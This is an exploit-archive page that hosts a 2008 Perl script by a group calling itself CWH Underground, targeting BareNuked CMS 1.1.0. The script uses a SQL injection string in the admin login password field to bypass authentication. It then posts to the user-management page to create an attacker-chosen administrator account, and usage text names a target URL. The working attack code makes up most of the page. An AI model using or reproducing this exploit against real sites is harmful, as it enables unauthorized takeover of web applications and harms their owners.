exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

barenuked-admin.txt

barenuked-admin.txt
Posted Jul 1, 2008
Authored by CWH Underground | Site citecclub.org

BareNuked CMS version 1.1.0 arbitrary add administrator exploit.

tags | exploit, arbitrary, add administrator
SHA-256 | a6908be2dd2579f41c42214d2c500002e33296afd563a93d7b0baf12812c5026

barenuked-admin.txt

Change Mirror Download
#!/usr/bin/perl
#============================================
# BareNuked CMS Arbitrary Add Admin Exploit
#============================================
#
# ,--^----------,--------,-----,-------^--,
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
# `+---------------------------^----------|
# `\_,-------, _________________________|
# / XXXXXX /`| /
# / XXXXXX / `\ /
# / XXXXXX /\______(
# / XXXXXX /
# / XXXXXX /
# (________(
# `------'
#
#AUTHOR : CWH Underground
#DATE : 30 June 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : BareNuked CMS
#VERSION : 1.1.0
#DOWNLOAD : http://downloads.sourceforge.net/barenuked/barenuked-1.1.0.zip
######################################################
#
#Note: magic_quotes_gpc = off
#
#This Exploit will Add user to Administrator's Privilege.
#
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
#
# milw0rm.com [2008-06-30]


use LWP;
use HTTP::Request;
use HTTP::Cookies;

if ($#ARGV + 1 != 4)
{
print "\n==============================================\n";
print " BareNuked CMS Arbitrary Add Admin Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==============================================\n";
print " \n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
print " \n";
print "Usage: ./xpl-barenuked.pl <BareNuked-CMS URL> <user> <pass> <email>\n";
print "Ex. ./xpl-barenuked.pl http://www.target.com/barenuked/ cwh password cwh\@cwh.com\n";
exit();
}

$cmsurl = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$mail = $ARGV[3];


$loginurl = $cmsurl."admin/index.php";
$adduserurl = $cmsurl."admin/users.php";
$post_content = "name=".$user."&pass=".$pass."&email=".$mail."&rights=admin&mode=create&Submit=New";

print "\n..::Login Page URL::..\n";
print "[+] $loginurl\n";
print "\n..::Add User Page URL::..\n";
print "[+] $adduserurl\n\n";

$ua = LWP::UserAgent->new;
$ua->cookie_jar(HTTP::Cookies->new);

$request = HTTP::Request->new (POST => $loginurl);
$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
$request->content_type ('application/x-www-form-urlencoded');
$request->content ('username=admin&password=\' or \'a\'=\'a&submit=Log+In');

$response = $ua->request($request);

$content = $response->content;

if ($content =~ /My Webpage Administration/)
{
print "\n!!! Login Success !!!\n\n";
}
else
{
print "\n!!! Login Failed !!!\n\n";
exit();
}

$request = HTTP::Request->new (POST => $adduserurl);
$request->content_type ('application/x-www-form-urlencoded');
$request->content ($post_content);
$response = $ua->request($request);

$content = $response->content;

if ($content =~ /$user/)
{
print "\n!!! Exploit Completed !!!\n";
}
else
{
print "\n!!! Exploit Failed !!!\n";
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close